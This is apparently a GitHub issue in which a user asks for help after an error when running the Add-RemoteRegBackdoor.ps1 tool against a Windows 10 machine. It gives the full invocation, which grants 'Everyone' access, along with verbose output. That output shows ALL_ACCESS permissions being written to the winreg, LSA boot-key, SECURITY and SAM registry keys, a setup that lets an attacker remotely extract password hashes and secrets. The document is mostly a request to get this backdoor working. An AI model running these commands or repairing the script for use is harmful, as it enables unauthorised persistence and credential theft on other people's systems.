Hi, I'm trying Add-RemoteRegBackdoor.ps1 on a domain joined windows 10 machine, and I get the following error on all registry keys:
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
Any idea on what might be wrong?
I'm attaching the output, but github's markdown makes it difficult to read. Here's the paste just in case:
https://pastebin.com/sbZVfwmn
Thanks!
`PS Microsoft.PowerShell.Core\FileSystem::\DAMP> Add-RemoteRegBackdoor -Trustee 'S-1-1-0' -ComputerName DESKTOP-13DT5NH -Verbose
VERBOSE: [DESKTOP-13DT5NH : ] Using trustee username 'Everyone'
Get-WMIObject : The RPC server is unavailable. (Exception from HRESULT: 0x800706BA)
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:185 char:36
- ... iceObject = Get-WMIObject -Class Win32_Service -Filter "name='RemoteR ...
-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- CategoryInfo : InvalidOperation: (:) [Get-WmiObject], COMException
- FullyQualifiedErrorId : GetWMICOMException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
VERBOSE: [DESKTOP-13DT5NH] Remote registry is not running, attempting to start
Add-RemoteRegBackdoor : [DESKTOP-13DT5NH] Error interacting with the remote registry service: You cannot call a method on a null-valued expression.
At line:1 char:1
- Add-RemoteRegBackdoor -Trustee 'S-1-1-0' -ComputerName DESKTOP-16QT4E ...
-
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Add-RemoteRegBackdoor
PS Microsoft.PowerShell.Core\FileSystem::\vmware-host\Shared Folders\share\DAMP> Add-RemoteRegBackdoor -Trustee 'S-1-1-0' -ComputerName DESKTOP-13DT5NH -Verbose
VERBOSE: [DESKTOP-13DT5NH : ] Using trustee username 'Everyone'
VERBOSE: [DESKTOP-13DT5NH] Remote registry is not running, attempting to start
VERBOSE: [DESKTOP-13DT5NH] Attaching to remote registry through StdRegProv
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
-
$RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
-
$RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
-
$RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
-
$RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
-
$RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
-
$RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
-
$RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH] Backdooring completed for system
ComputerName BackdoorTrustee
DESKTOP-13DT5NH S-1-1-0
`